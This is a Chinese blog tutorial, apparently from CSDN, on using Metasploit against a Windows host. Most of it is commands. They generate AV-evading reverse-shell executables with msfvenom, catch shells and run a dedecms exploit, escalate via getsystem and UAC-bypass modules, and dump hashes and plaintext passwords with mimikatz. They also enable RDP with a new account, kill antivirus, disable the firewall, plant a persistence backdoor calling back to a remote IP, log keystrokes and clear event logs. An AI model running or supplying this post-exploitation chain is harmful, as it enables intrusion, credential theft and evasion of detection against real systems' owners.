metasploit使用方法

metasploit使用
主要功能 可以对目标进行扫描探测,漏洞利用,提权,获取hash以及横向渗透
分为正向连接和反向连接,即主机连接目标,目标连接主机
反向连接优势:即使目标存在waf,生成的木马不被检测即可反弹shell
本机ip为192.168.0.2 监听端口为4444 目标主机为192.168.0.5,已获取目标低权限shell
设置端口时可以设置为8080,22,80等常见端口,避免防火墙检测
主要流程为
生成木马,上传目标主机(执行木马获取shell)或者直接使用exp获取shell
生成二进制文件
msfvenom -a x86 --platform Windows -p windows/shell/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ -i 3 lhost=192.168.0.1 lport=4444 -f exe >shell.exe
-a 符合目标主机的架构
–platform 系统平台为windows
-p 使用的有效载荷为windows下正向链接的tcp连接,如果连接成功会返回一个shell 在这里,除了正向连接还有反向连接 可以使用# msfvenom -l payload 查看所有载荷
-e 使用编码x86/shikata_ga_nai,以增加绕过目标主机的机率 ,可以使用msfvenom -l encoders列出有效编码
-b 特征码绕过,防止杀软通过特征码进行查杀
-i 编码次数
-f 输出格式
msfvenom -p linux/x86/meterpreter/bind_tcp lport=4444 -f elf -o shell正向连接主要为内网连接主机,不需要设置ip
正向连接为bind_tcp

实现方式
msfconsole启动
生成php
msfvenom -p windows/shell/reverse_tcp lhost=192.168.0.1 lport=4444 -f exe >/root/shell.exe
上传文件后,监听4444端口

use exploit/multi/handler
set payload windows/shell/reverse_tcp(可以使用info windows/shell/reverse_tcp查看信息)
show options(查看需要设置的条件)
set lhost 192.168.0.1
set lport 4444
run(exploit)执行
如果目标存在某种cms漏洞,以dedecms为例
search dedecms (查询dedecms以往漏洞)
use /root/dedecms1.7
show options
set(设置参数)
run(exploit -h可以指定参数使用exploit -z 不进入shell)
linux执行文件为elf
获取shell后
help即可查看能够运行的命令
提权
getuid
查看当前用户
ps所有进程
使用getsystem进行提权
uac实际上就是window右键以管理员身份运行时,系统出现的弹窗
byuac不进行弹窗以管理员身份运行,反弹获取的shell为system
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
use exploit/windows/local/bypassuac_fodhelperuse exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac_comhijack
search byuac 即可
绕不过去的话使用
use post/multi/recon/local_exploit_suggester
使用此脚本进行检测,报错率较高,使用显示出的脚本路径
获取hash
第一种方法
hashdump(获取加密后的账号密码)
第二种方法
1
load mimikatz
msv(与hashdump差不多)
kerberos
wdigest
tspkg(获取系统账户信息,获得明文密码)
2.
load mimikatz #加载mimikatz
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
开启远程3389端口
run post/windows/manage/enable_rdp
run getgui -e
run post/windows/manage/enable_rdp username=“abc” password=“abc”(添加账户,密码)
执行成功,可以使用kali的rdesktop命令使用远程桌面连接目标主机
rdesktop -u abc -p abc 192.168.250.176:3389
migrate pid(迁移进程)
killav
netsh adcfirewall set allprofiles state off(关闭防火墙)
run persistence -X -i 5 -p 4444 -r 172.17.11.18 (植入后门程序,权限维持)
run keylogrecorder”命令为记录键盘信息
clearev清除事件日志
未涉及横向,下一篇为横向

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值